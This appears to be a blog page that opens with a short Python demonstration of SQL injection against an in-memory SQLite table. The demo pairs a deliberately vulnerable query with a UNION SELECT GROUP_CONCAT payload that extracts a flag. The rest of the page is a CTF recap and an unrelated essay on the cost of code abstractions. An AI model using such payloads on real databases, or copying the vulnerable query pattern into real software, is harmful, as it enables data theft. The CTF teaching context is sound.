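```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE users (id INTEGER, name TEXT);
INSERT INTO users VALUES (1, 'alice'), (2, 'bob');
CREATE TABLE flags (flag TEXT);
INSERT INTO flags VALUES ('flag{example}');
""")

def lookup(user_id):
    # Vulnerable: user input is spliced directly into the SQL string.
    query = f"SELECT name FROM users WHERE id = {user_id}"
    return conn.execute(query).fetchall()

payload = "0 UNION SELECT GROUP_CONCAT(flag) FROM flags"
print(lookup(payload))  # [('flag{example}',)]
```

GROUP_CONCAT is handy here because it collapses many rows into one string, so a single injected row can exfiltrate a whole column.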

Now it was super late at night but team chocolates was #2 on the leaderboard. The challenges had all been so much fun and the VMs and setup for each were super well done, so I was very enthusiastic and feeling very hungry for the #1 spot. The next morning I was very excited as I thought the competition would end on that Friday (Alok eventually explained to me that we had an extra week) and I ran round to round up people to help. I didn't want to lose and was wondering about getting IDA Pro to solve the floppy challenge. Turns out Zach and Trammell were the right choices and chocolates got to #1 while I slept.


The contest was a ton of fun. It was my first time attempting shellcode and first time doing SQL injection. It made me really appreciate the value of having a library of tools in security research. The field has developed its own culture and experts, and can seem impenetrable (pun!). This CTF made it accessible to me in a way I never anticipated.

I learnt new techniques: about instruction encoding, dynamic linking, and about process from Trammell. He showed me how to connect qemu in debug mode to Hopper. The way he approached the problem was very different to my unskilled initial expectations: I thought of trying to extract the logic into a sandbox and would have been tripped up by all the countermeasures in the code, whereas Trammell's confident holistic reverse engineering quickly neutralised them.

In terms of the mechanics, the contest framework, with VMs being spun up, was ambitious and worked perfectly. On a non-technical level, the jokes and teasing with RickRolls and countermeasures made the challenges personal. Solving the problems was joyous. It left me very impressed with the culture at Square, that visibly invested so much. The contest was run really well with great responsiveness on Slack, and I'd love to do more CTFs. Thanks Square!

Post a comment

Zero value abstractions

Posted 2017-10-06 22:00:00 GMT

The Rust and C++ communities have embraced the idea of abstractions without runtime overhead. Object-oriented programming encourages dynamic dispatch: at run-time choosing what to do based on the type. This is costly: there is a small direct cost, as a decision has to be made at runtime, and a potentially very expensive consequence, as the compiler can't inline and propagate constants. However, it allows code to be written once which works with many types. So-called zero-cost abstractions avoid this by having the compiler figure out the specific concrete implementation behind the abstraction and then perform its optimizations with this information.

Runtime cost is actually only part of the cost of an abstraction. Even if there is no runtime cost, abstractions must provide value as they have other costs. An abstraction introduces a new concept and imposes a mental burden on the people working with it. In the ideal case, the abstraction is perfectly aligned with the problem domain: for example, it's often very convenient to be able to show something on the screen and get its dimensions independently of whether it is a photo or a video — abstracting over the difference reduces the amount of code written, and makes it clear that the code doesn't care about those details. This may actually be good for people debugging and reading the code.

Abstractions defined in the wrong way can make it hard to modify code: by muddling together unrelated things, by hiding useful details, increasing compile times, or just by confusing people and taking up mental space. These costs are less easy to measure than the runtime cost. However, they can be much more expensive. Debugging code from a stagnant project, where the build environment isn't readily available, is vastly harder when there are layers of abstraction. Abstractions obscure the answer to the question: what does this code actually do?

Weak engineers can try to abstract away the parts of the project they don't know how to accomplish. No value is being added there. Another abuse is in wrapping existing code and interfaces belonging to another project or group: this sort of wrapping layer is very easy to write and gives an illusion of productivity, but means that the people who own the code will now have to understand a wrapper in order to help.

It's fun to reduce runtime costs. However, given the other costs are normally more significant, it's important to think of the value that the abstraction brings. An abstraction needs to be valuable even if there are no runtime costs. How much does it really help?

The worst abstractions abstract nothing, and provide no value: most commonly, a grand interface with a single implementation. They impose a cost on all readers — slogging through meaningless code, and slow people debugging production issues, who eventually have to understand that the interface is a mask for the real underlying implementation. Abstractions are costly. When reviewing or writing code, remember abstractions must provide value.

Post a comment

Older entries (109 remaining)